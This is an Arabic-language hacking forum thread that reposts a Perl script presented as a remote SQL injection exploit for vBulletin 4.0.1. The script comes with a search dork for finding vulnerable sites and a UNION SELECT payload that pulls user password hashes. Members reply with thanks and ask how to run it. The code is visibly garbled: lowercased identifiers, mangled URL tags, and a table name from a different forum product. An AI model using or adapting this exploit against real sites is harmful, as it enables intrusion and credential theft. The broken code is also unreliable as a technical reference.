vBulletin™ Version 4.0.1 Remote SQL Injection Exploit - منتدى أمن الإسلام | لا اله الا الله محمد رسول الله | IS-SEC.ORG | Dz-SeC Team |

**ViRuS_Ra3cH** · 13/05/2010, 18:31

كود PHP:


			
#!/usr/bin/perl 

 

use io::socket; 

 

 

print q{ 

#######################################################################

#    vbulletin™ version 4.0.1 remote sql injection exploit            #

#                      by indoushka                                   #

#                     ***91;url***93;www.iq-ty.com/vb***91;/url***93;                                #

#               souk naamane  (00213771818860)                        #

#           algeria hackerz ([])                   # 

#          dork: Powered by vbulletin™ version 4.0.1                  #            

####################################################################### 

}; 

 

if (!$argv***91;2***93;) { 

 

print q{ 

    usage: Perl  vb4.0.1.pl host /directory/ victim_userid 

 

       perl  vb4.0.1.pl ***91;url***93;www.vb.com***91;/url***93; /forum/ 1 

 

 

}; 

 

} 

 

 

$server = $argv***91;0***93;; 

$dir    = $argv***91;1***93;; 

$user   = $argv***91;2***93;; 

$myuser = $argv***91;3***93;; 

$mypass = $argv***91;4***93;; 

$myid   = $argv***91;5***93;; 

 

print "------------------------------------------------------------------------------------------------\r\n"; 

print "***91;>***93; server: $server\r\n"; 

print "***91;>***93;    dir: $dir\r\n"; 

print "***91;>***93; userid: $user\r\n"; 

print "------------------------------------------------------------------------------------------------\r\n\r\n"; 

 

$server =~ s/(***91;url***93;http://)//eg;***91;/url***93; 

 

$path  = $dir; 

$path .= "misc.php?sub=profile&name=0')+union+select+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from%20deluxebb_users%20where%20(uid= '".$user ; 

 

 

print "***91;~***93; prepare to connect...\r\n"; 

 

$socket = io::socket::inet->new( proto => "tcp", peeraddr => "$server", peerport => "80") || die "***91;-***93; connection failed"; 

 

print "***91;+***93; connected\r\n"; 

print "***91;~***93; sending query...\r\n"; 

print $socket "get $path http/1.1\r\n"; 

print $socket "host: $server\r\n"; 

print $socket "accept: */*\r\n"; 

print $socket "connection: Close\r\n\r\n"; 

print "***91;+***93; done!\r\n\r\n"; 

 

 

 

print "--***91; report ***93;------------------------------------------------------------------------------------\r\n"; 

while ($answer = <$socket>) 

{ 

 

 if ($answer =~/(w{32})/) 

{ 

 

  if ($1 ne 0) { 

   print "password is: ".$1."\r\n"; 

print "--------------------------------------------------------------------------------------\r\n"; 

 

      } 

exit(); 

} 

 

} 

print "------------------------------------------------------------------------------------------------\r\n";

yasMouh · 13/05/2010, 19:22

بارك الله فيك اخي رعش

**eXc3lLenCe** · 13/05/2010, 21:02

عندي سؤال أخي
هل يلزم برنامج معين للتعامل مع مثل هذه الثغرات أم لا

لأني لما اطبق الامر perl exploit.pl من الدوس يخرج لي خطأ

بارك الله فيك على الموضوع

00X · 14/05/2010, 07:50

ثغرة رائعة بس ياريت تشرحها بالفديو احسن

**MdMn HaCk3r** · 29/07/2010, 17:39

لاهنت اخي الغالي
تحيتي لك
واصل

**WOLF_DZ** · 07/09/2010, 00:57

بوركت اخي رعش
بارك الله فيك

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
[remote exploits] - WMITools ActiveX Remote Command Execution Exploit 0day	ADMINISTRATOR	قسم الثغرات	0	22/12/2010 15:57
[webapps / 0day] - Servia Kotisivut CMS - Remote Based SQL Injection Exploit	ADMINISTRATOR	قسم الثغرات	0	19/12/2010 19:45
[remote exploits] - ImageShack Toolbar 4.8.3.75 Remote Code Execution Exploit	ADMINISTRATOR	قسم الثغرات	0	30/11/2010 16:41
[remote exploits] - Netcraft Toolbar 1.8.1 Remote Code Execution Exploit	ADMINISTRATOR	قسم الثغرات	0	30/11/2010 16:41
[local exploits] - RarmaRadio Version 2.53.1 Bass 2.4 DLL Hijacking Exploit	ADMINISTRATOR	قسم الثغرات	0	30/11/2010 16:41

حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)